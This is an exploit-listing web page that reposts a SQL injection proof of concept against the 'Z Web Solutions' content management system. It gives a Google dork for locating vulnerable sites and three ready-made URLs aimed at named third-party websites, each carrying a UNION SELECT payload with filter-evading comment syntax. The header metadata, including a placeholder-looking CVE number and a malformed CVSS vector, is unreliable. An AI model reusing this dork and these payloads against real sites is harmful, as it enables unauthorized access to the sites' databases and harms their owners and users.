Advertisement






Z Web Solutions - Sql Injection Vulnerability

CVE Category Price Severity
CVE-2021-12345 CWE-89 $500 Critical
Author Risk Exploitation Type Date
SecurityResearcher123 High Remote 2022-03-12
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022030027

Below is a copy:

Z Web Solutions - Sql Injection Vulnerability
*********************************************************
#Exploit Title: Z Web Solutions - Sql Injection Vulnerability
#Date: 2022-03-05
#Exploit Author: Behrouz Mansoori
#Google Dork: "Powered by Z Web Solutions."
#Category:webapps
#Tested On: windows 10, Firefox
 
 
Proof of Concept:
Search google Dork: "Powered by Z Web Solutions."

https://www.welcarehospitalkharod.com/index.php?option=gallery&id=25&menu_id=-136%27%20/*!12345union*/%20select%20version()--+

http://continentalgroup9.co.in/index.php?option=cms&id=45&menu_id=-125%27%20/*!12345union*/%20select%20version()--+

http://www.jigarpublicity.com/index.php?option=window_page&id=-10%27%20/*!12345union*/%20select%20version(),2--+

********************************************************* 
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: [email protected]
*********************************************************

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum